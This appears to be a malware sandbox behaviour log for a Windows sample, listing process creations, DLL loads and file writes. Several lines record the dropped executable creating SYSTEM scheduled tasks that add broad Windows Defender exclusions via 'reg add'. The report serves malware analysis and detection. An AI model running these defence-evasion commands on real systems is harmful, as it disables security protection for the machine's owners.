Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
Source: unknownProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
Source: unknownProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
Source: unknownProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
Source: unknownProcess created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: sxs.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: devenum.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeSection loaded: tbcore3u.dll
Source: C:\Users\user\Documents\0b1G0H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 138745635-72645747.116.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 138745635-72645747.116.exeStatic file information: File size 30950400 > 1048576
Source: 138745635-72645747.116.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d5a400
